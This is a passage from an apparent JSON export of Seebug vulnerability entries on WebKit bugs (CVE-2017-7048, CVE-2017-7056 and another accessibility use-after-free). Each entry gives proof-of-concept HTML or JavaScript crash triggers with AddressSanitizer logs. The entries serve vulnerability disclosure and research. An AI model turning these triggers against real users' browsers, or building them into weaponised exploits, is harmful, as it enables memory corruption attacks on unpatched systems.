f2\r\n Stack right redzone: f3\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==728==ABORTING\r\n```", "published": "2017-07-27T00:00:00", "type": "seebug", "title": "WebKit: use-after-free in WebCore::AccessibilityNodeObject::textUnderElement(CVE-2017-7048)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7048"], "modified": "2017-07-27T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96314", "id": "SSV:96314", "sourceData": "\n <script>\r\nfunction go() {\r\n li.hidden = true;\r\n 
dir.setAttribute(\"aria-labeledby\", \"map\");\r\n}\r\n</script>\r\n<body onload=go()>\r\n<dir id=\"dir\">\r\n<li id=\"li\">\r\n<map id=\"map\">\r\n<area></area>\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96314", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T11:56:42", "description": "Here is a snippet of `ArgumentsEliminationPhase::transform`\r\n```\r\n case LoadVarargs:\r\n ...\r\n if (candidate->op() == PhantomNewArrayWithSpread || candidate->op() == PhantomSpread) {\r\n ...\r\n if (argumentCountIncludingThis <= varargsData->limit) {\r\n storeArgumentCountIncludingThis(argumentCountIncludingThis);\r\n // store arguments\r\n ...\r\n }\r\n\r\n node->remove();\r\n node->origin.exitOK = canExit;\r\n break;\r\n }\r\n```\r\nWhether or not the \"argumentCountIncludingThis <= varargsData->limit\" condition is satisfied, it removes the |node| variable and exits the switch statement. So in this case the condition is not satisfied, the arguments object created by the following code(CreateDirectArguments in the PoC) may have uninitialized values and length.\r\n\r\n### PoC:\r\n```\r\nconst kArgsLength = 0x101;\r\n\r\nlet buggy = null;\r\nfunction inlineFunc() {\r\n if (arguments.length != kArgsLength) {\r\n buggy = arguments;\r\n }\r\n}\r\n\r\nclass ClassForInine extends inlineFunc {\r\n}\r\n\r\nfunction sleep(ms) {\r\n let start = new Date();\r\n while (new Date() - start < ms);\r\n}\r\n\r\nfunction main() {\r\n let args = new Array(kArgsLength);\r\n args.fill(333 + 1);\r\n args = args.join(', ');\r\n\r\n let opt = new Function(`(() => {\r\n new ClassForInine(${args});\r\n })();`);\r\n\r\n for (let i = 0; i < 0x100000; i++) {\r\n opt();\r\n\r\n if (i === 0x3000)\r\n sleep(1000);\r\n\r\n if (buggy) {\r\n print('buggy.length: ' + buggy.length);\r\n break;\r\n }\r\n }\r\n\r\n for (let i = 0, n = buggy.length; i < n; i++) {\r\n print(buggy[i]);\r\n }\r\n}\r\n\r\nmain();\r\n```", 
"published": "2017-07-27T00:00:00", "type": "seebug", "title": "WebKit: JSC: Incorrect LoadVarargs handling in ArgumentsEliminationPhase::transform(CVE-2017-7056)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7056"], "modified": "2017-07-27T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96301", "id": "SSV:96301", "sourceData": "\n const kArgsLength = 0x101;\r\n\r\nlet buggy = null;\r\nfunction inlineFunc() {\r\n if (arguments.length != kArgsLength) {\r\n buggy = arguments;\r\n }\r\n}\r\n\r\nclass ClassForInine extends inlineFunc {\r\n}\r\n\r\nfunction sleep(ms) {\r\n let start = new Date();\r\n while (new Date() - start < ms);\r\n}\r\n\r\nfunction main() {\r\n let args = new Array(kArgsLength);\r\n args.fill(333 + 1);\r\n args = args.join(', ');\r\n\r\n let opt = new Function(`(() => {\r\n new ClassForInine(${args});\r\n })();`);\r\n\r\n for (let i = 0; i < 0x100000; i++) {\r\n opt();\r\n\r\n if (i === 0x3000)\r\n sleep(1000);\r\n\r\n if (buggy) {\r\n print('buggy.length: ' + buggy.length);\r\n break;\r\n }\r\n }\r\n\r\n for (let i = 0, n = buggy.length; i < n; i++) {\r\n print(buggy[i]);\r\n }\r\n}\r\n\r\nmain();\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96301", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T11:56:44", "description": "There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly.\r\n\r\nNote that accessibility features need to be enabled in order to trigger this bug. On Safari on Mac this can be accomplished by opening the inspector (simply opening the inspector enables accessibility features). 
On WebKitGTK+ (and possibly other WebKit releases) accessibility features are enabled by default.\r\n\r\n### PoC:\r\n\r\n=================================================================\r\n```\r\n<style>\r\n#link { text-transform: lowercase; }\r\nlink::first-letter { border-spacing: 1em; }\r\n</style>\r\n<script>\r\nfunction go() {\r\n dt.appendChild(link);\r\n var s = link.style;\r\n s.setProperty(\"display\", \"table-column-group\");\r\n s.setProperty(\"-webkit-appearance\", \"menulist-button\");\r\n}\r\nfunction eventhandler() {\r\n dir.setAttribute(\"aria-labeledby\", \"meta\");\r\n link.appendChild(table.rows[0]);\r\n}\r\n</script>\r\n<body onload=go()>\r\n<link id=\"link\">\r\n<meta id=\"meta\">\r\n<dir id=\"dir\">\r\n<table id=\"table\">\r\n<th>1</th>\r\n<dt id=\"dt\">\r\n<iframe onload=\"eventhandler()\"></iframe>\r\n```\r\n=================================================================\r\n\r\n### ASan log:\r\n```\r\n=================================================================\r\n==30692==ERROR: AddressSanitizer: heap-use-after-free on address 0x608000090ac8 at pc 0x00010841ba26 bp 0x7fff5ca8ea60 sp 0x7fff5ca8ea58\r\nREAD of size 4 at 0x608000090ac8 thread T0\r\n==30692==WARNING: invalid path to external symbolizer!\r\n==30692==WARNING: Failed to use and restart external symbolizer!\r\n #0 0x10841ba25 in WebCore::RenderObject::RenderObjectBitfields::hasLayer() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x6aa25)\r\n #1 0x10a8983fe in WebCore::RenderElement::addChild(WebCore::RenderObject*, WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x24e73fe)\r\n #2 0x10ab7d6ec in WebCore::createTextRenderer(WebCore::Text&, WebCore::RenderTreePosition&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27cc6ec)\r\n #3 0x10ab7b057 in 
WebCore::RenderTreeUpdater::updateTextRenderer(WebCore::Text&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27ca057)\r\n #4 0x10ab7abfa in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c9bfa)\r\n #5 0x10ab7a47b in WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c947b)\r\n #6 0x108b1f7e9 in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76e7e9)\r\n #7 0x108b20287 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f287)\r\n #8 0x108ec59ce in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb149ce)\r\n #9 0x108ec2d0c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb11d0c)\r\n #10 0x108b3e493 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x78d493)\r\n #11 0x1090b25c0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd015c0)\r\n #12 0x108bdd093 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c093)\r\n #13 0x108b9c386 in WebCore::DocumentLoader::finishedLoading() 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386)\r\n #14 0x10862b997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)\r\n #15 0x1086252aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)\r\n #16 0x10afacc41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)\r\n #17 0x105ec22eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)\r\n #18 0x105ec5689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)\r\n #19 0x105ec4ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)\r\n #20 0x105765683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)\r\n #21 0x10550f3b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5)\r\n #22 0x105518888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888)\r\n #23 0x1162c0312 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03312)\r\n #24 0x1162c0d41 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03d41)\r\n #25 0x7fffd2f753c0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa73c0)\r\n #26 0x7fffd2f562cc in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x882cc)\r\n #27 0x7fffd2f557c5 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x877c5)\r\n #28 0x7fffd2f551c3 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x871c3)\r\n #29 0x7fffd24b6ebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb)\r\n #30 0x7fffd24b6cf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0)\r\n #31 0x7fffd24b6b25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25)\r\n #32 0x7fffd0a51e23 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46e23)\r\n #33 0x7fffd11cd85d in -[NSApplication(NSEvent) 
_nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c285d)\r\n #34 0x7fffd0a467aa in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b7aa)\r\n #35 0x7fffd0a111dd in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x61dd)\r\n #36 0x7fffe89118c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6)\r\n #37 0x7fffe89102e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3)\r\n #38 0x10316c56c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c)\r\n #39 0x7fffe86b8234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234)\r\n\r\n0x608000090ac8 is located 40 bytes inside of 96-byte region [0x608000090aa0,0x608000090b00)\r\nfreed by thread T0 here:\r\n #0 0x1031d4294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294)\r\n #1 0x116307f30 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c4af30)\r\n #2 0x10a79d874 in WebCore::RenderBlock::createFirstLetterRenderer(WebCore::RenderElement*, WebCore::RenderText*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23ec874)\r\n #3 0x10a79e15a in WebCore::RenderBlock::updateFirstLetter(WebCore::RenderBlock::RenderTreeMutationIsAllowed) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23ed15a)\r\n #4 0x10a783761 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d2761)\r\n #5 
0x10a80333f in WebCore::RenderBlockFlow::layoutLineBoxes(bool, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x245233f)\r\n #6 0x10a7ca957 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419957)\r\n #7 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7)\r\n #8 0x10a7cfd9c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241ed9c)\r\n #9 0x10a7cc522 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241b522)\r\n #10 0x10a7ca962 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419962)\r\n #11 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7)\r\n #12 0x10a7cfd9c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241ed9c)\r\n #13 0x10a7cc522 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241b522)\r\n #14 0x10a7ca962 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419962)\r\n #15 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7)\r\n #16 0x10a7cfd9c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241ed9c)\r\n #17 0x10a7cc522 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241b522)\r\n #18 0x10a7ca962 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419962)\r\n #19 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7)\r\n #20 0x10a7cfd9c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241ed9c)\r\n #21 0x10a7cc522 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241b522)\r\n #22 0x10a7ca962 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419962)\r\n #23 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7)\r\n #24 0x10ab8536d in 
WebCore::RenderView::layoutContent(WebCore::LayoutState const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d436d)\r\n #25 0x10ab85b74 in WebCore::RenderView::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d4b74)\r\n #26 0x108f00943 in WebCore::FrameView::layout(bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb4f943)\r\n #27 0x108b1a1d0 in WebCore::Document::updateLayout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7691d0)\r\n #28 0x108b207b2 in WebCore::Document::updateLayoutIgnorePendingStylesheets(WebCore::Document::RunPostLayoutTasks) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f7b2)\r\n #29 0x108cd3b21 in WebCore::Element::innerText() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x922b21)\r\n\r\npreviously allocated by thread T0 here:\r\n #0 0x1031d3d2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c)\r\n #1 0x7fffe883a281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281)\r\n #2 0x116311ae4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c54ae4)\r\n #3 0x116306c4d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c49c4d)\r\n #4 0x11629c437 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bdf437)\r\n #5 0x11629b768 in 
WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bde768)\r\n #6 0x1085bb548 in WebCore::RenderObject::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x20a548)\r\n #7 0x10b157c4d in WebCore::RenderPtr<WebCore::RenderText> WebCore::createRenderer<WebCore::RenderText, WebCore::Text&, WTF::String const&>(WebCore::Text&&&, WTF::String const&&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2da6c4d)\r\n #8 0x10b157aae in WebCore::Text::createTextRenderer(WebCore::RenderStyle const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2da6aae)\r\n #9 0x10ab7d6a4 in WebCore::createTextRenderer(WebCore::Text&, WebCore::RenderTreePosition&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27cc6a4)\r\n #10 0x10ab7b057 in WebCore::RenderTreeUpdater::updateTextRenderer(WebCore::Text&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27ca057)\r\n #11 0x10ab7abfa in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c9bfa)\r\n #12 0x10ab7a47b in WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c947b)\r\n #13 0x108b1f7e9 in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76e7e9)\r\n #14 0x108b20287 in WebCore::Document::implicitClose() 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f287)\r\n #15 0x108ec59ce in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb149ce)\r\n #16 0x108ec2d0c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb11d0c)\r\n #17 0x108b3e493 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x78d493)\r\n #18 0x1090b25c0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd015c0)\r\n #19 0x108bdd093 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c093)\r\n #20 0x108b9c386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386)\r\n #21 0x10862b997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)\r\n #22 0x1086252aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)\r\n #23 0x10afacc41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)\r\n #24 0x105ec22eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)\r\n #25 0x105ec5689 in void 
IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)\r\n #26 0x105ec4ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)\r\n #27 0x105765683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)\r\n #28 0x10550f3b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5)\r\n #29 0x105518888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888)\r\n\r\nSUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x6aa25) in WebCore::RenderObject::RenderObjectBitfields::hasLayer() const\r\nShadow bytes around the buggy address:\r\n 0x1c1000012100: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012110: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012120: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x1c1000012130: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x1c1000012140: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa\r\n=>0x1c1000012150: fa fa fa fa fd fd fd fd fd[fd]fd fd fd fd fd fd\r\n 0x1c1000012160: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 
0x1c1000012170: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012180: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012190: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x1c10000121a0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==30692==ABORTING\r\n```", "published": "2017-07-27T00:00:00", "type": "seebug", "title": "WebKit: use-after-free in 